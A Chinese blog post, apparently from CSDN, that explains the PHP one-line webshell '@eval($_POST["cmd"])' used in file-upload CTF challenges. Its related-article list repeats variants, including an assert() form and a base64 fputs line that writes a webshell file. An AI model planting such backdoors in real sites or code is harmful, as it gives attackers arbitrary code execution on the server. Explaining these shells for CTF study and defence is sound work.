一句话木马@eval($_POST[“cmd“]);是什么意思(超详细)

最新推荐文章于 2024-05-02 14:26:53 发布
最新推荐文章于 2024-05-02 14:26:53 发布
阅读量1.9w 收藏 26
点赞数 12
文章标签: php 安全 开发语言 upload html5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62708558/article/details/123030828
版权

在文件上传(upload)类ctf题中,相信大家都接触过一句话木马

<?php

@eval($_POST["cmd"]);

?>

那么具体它是扫描意思呢

POST

是html中<form>标签的POST方法

在页面中,所有的POST方法都会由submit输入方式向action中的php文件返还信息,通常这样的php文件是连着着数据库的,甚至可以直接对文件进行操作

PHP eval()函数

eval(str)函数吧str字符串按照php代码来计算

该str字符串必须是合法的PHP代码,且必须以分号结尾

如果没有在代码字符串中调用return语句,则返回NULL。如果代码存在解析错误,则eval()函数返回false

$_POST[XXX]

当使用<form>标签的post方法时候,同时<form>标签里面的name属性等于cmd

例如:<form  action="xxx.php"  name="cmd"  method="post">

会在php文件中产生一个$_POST[cmd]变量,变量中储存有用户提交的数据,

假设用户在输入框中输入了:phpinfo();

那么$_POST[cmd]变量便会变成  "phpinfo();"  这个字符串

再加上eval()方法函数将用户输入的字符串进行执行,那么用户便可以通过输入php语句来达到任意操作数据库和服务器的效果了

yuko156
关注
  • 12
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
reset_jetbrains_eval_windows.rar
10-08
reset_jetbrains_eval_windows.rar
一句话木马的深入理解
giaogiao123的博客
08-08 832
我们都知道一句话木马比如说 <?php @eval($_POST['cmd']);?> 我们平常的认知都是去写入一句话木马到一个php文件或者是jsp文件,然后连接那个文件的目录,实际上,不需要写入文件,我们照样可以利用eval函数造成一句话的形成最后拿下网站webshell demo <?php if(isset($_GET['c'])){ $c = $_GET['c']; eval($c); }else{ highlight_file(__FILE_
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
百彦子烨的博客
11-10 1万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
eval函数简介与PHP一句话木马剖析
对代码不满足,是任何真正有天才的程序员的根本特征。
01-29 2万+
eval函数简介与PHP一句话木马剖析    大家好我是Carol,我的QQ是:906871417 一:eval函数 二:eval函数的一般用法 三:eval函数的特殊用法 四:php一句话挂马的原理 五:禁用eval函数   一:eval函数 1.eval() 函数把字符串按照 PHP 代码来计算。 2.该
[shell] $@ 与 eval
weixin_43742643的博客
08-28 317
@的用法以及与$*的区别可以参考测试脚本如下一般情况下,我们可能会这样执行脚本输出如下,可见"$*"会把所有的参数包裹在单引号里作为一个完整的参数,这样bash -c才能正常运行。然后我们这样执行一次脚本输出如下,可以看出只有"$@"可以保证参数的一致性。如果这个脚本继续调用其他脚本,并切希望把参数继续传递下去,那么最好使用。
linux eval命令详解,linux命令详解——eval
weixin_31092081的博客
04-29 6496
shell中的eval功能说明:从新运算求出参数的内容。语  法:eval [参数]补充说明:eval可读取一连串的参数,而后再依参数自己的特性来执行。参  数:参数不限数目,彼此之间用分号分开。html1.eval命令将会首先扫描命令行进行全部的替换,憨厚再执行命令。该命令使用于那些一次扫描没法实现其功能的变量。该命令对变量进行两次扫描。这些须要进行两次扫描的变量有时候被称为复杂变量。linux...
php一句话木马中的@有什么用
热门推荐
stybill的博客
12-14 4万+
<?php @eval($_POST['attack']) ?> @ 表示后面即使执行错误,也不报错 eval() 函数表示括号内的语句字符串什么的全都当做代码执行 $_POST[‘attack’] 表示从页面中获得attack这个参数值 只要攻击者满足这三条添加,就能实现入侵: (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。 ...
eval一句话的简单理解
这周末在做梦的博客
05-06 876
eval类型的一句话的见解一,$_POST1概述2常见格式3使用方式二,$_GET1概述2常见格式3使用方法4举例一级目录二级目录三级目录 一,$_POST 1概述 POST是一种取数据的方式。请求开始后,浏览器要向服务器额外发送一些数据,例如cookie、用户名、密码等等,这些数据不体现在URL上,发送完毕后服务器再将数据(网页)传送给浏览器。 (下述为个人理解) 通过该方法传递,简单来说就是用传递的参数构建连接,一旦主动调用后,参数将传递至服务器,且服务器响应200,就建立了TCP/UDP连接,可以通
【转】php eval函数用法
zzz的博客
07-06 1071
php eval ()函数 定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 语法 eval(phpcode) 提示 返回语句会立即终止对字符串的计算。 该函数对于在数据
<?php eval($_post[cmd]);?>,php eval函数用法及相关技巧
weixin_42813171的博客
03-18 3727
eval函数可将字符串之中的变量值代入,通常用在处理数据库的数据上。eval将值代入字符串之中。语法: void eval(string code_str);传回值: 无函式种类: 数据处理本函式可将字符串之中的变量值代入,通常用在处理数据库的数据上。参数 code_str 为欲处理的字符串。值得注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函式处理后的字符串会沿...
一句话木马含义
00勇士王子的博客
04-19 603
<?php @eval($_POST['test']) ?> 我们都知道一句话木马上传后可以连接菜刀或是蚁剑,那这句代码是什么意思呢? 首先,这是PHP一句话木马,要符合PHP代码的格式,php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。 @表示后面即使执行错误,也不报错。 eval()函数表示括号内的语句字符串什么的全都当做代码执行。 $_POST[‘test’]表示从页面中获得test这个参数值。 ...
Eval一句话asp连接
11-10
Eval一句话asp连接,自己下的,病毒清理了,自己玩玩的。
license_eval_halcon_progress_2022_03.dat
03-01
license_eval_halcon_progress_2022_03.dat
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
01-20
eval($_POST[c]);?> 最后查到某文件内的第一行为以下代码: 复制代码 代码如下: fputs(fopen(base64_decode(“bW0ucGhw”),”w”),base64_decode(“PD9ldmFsKCRfUE9TVFtjXSk7Pz4=”)); base64_...
教你识别简单的免查杀PHP后门
01-20
一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?...
STM3210C_EVAL_stm32_STM3210C_EVAL_temperature565_
09-29
STM3210C_EVAL 的 LL 和 HAL 例程
ap算法matlab代码-DARKFACE_eval_tools:DARKFACE_eval_tools
06-02
请注意,eval_tools 预计可与八度一起使用,从 MATLAB 运行时可能会出现错误 docker pull scaffrey/eval_tools_ap:dry_run docker run --rm -it \ -v /path/to/your/submission:/tools/data \ -v /path/to/save/...
【Web】CTFSHOW 中期测评刷题记录(1)
最新发布
uuzeray的博客
05-02 1048
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
supervisor 简单理解
qq_42857358的博客
04-28 238
test.ini文件内容。
<?php @eval($_POST['pass']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['hack']);?>和<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[hack]);?>'); ?>中的hack为什么一个加单引号,一个不加单引号
07-16
这段代码中的 `hack` 是一个字符串,它的作用是作为参数传递给 `eval()` 函数进行执行。在第一行代码中,`$_POST['hack']` 是一个变量,所以需要使用单引号将其括起来。这样做是为了确保 `$_POST['hack']` 中的内容被视为字符串而不是其他类型的数据。而在第二行代码中,`$_POST[hack]` 没有使用单引号,这是因为它被视为一个常量而不是变量。在这种情况下,如果不存在名为 `hack` 的常量,PHP 会将其作为字符串处理。 请注意,这段代码涉及到 `eval()` 函数,它可以执行传递给它的任意 PHP 代码。这种使用方式是非常危险的,因为恶意用户可以通过提交恶意代码来执行不受控制的操作。建议在编写代码时避免使用 `eval()` 函数,并使用安全的输入验证和过滤来防止代码注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值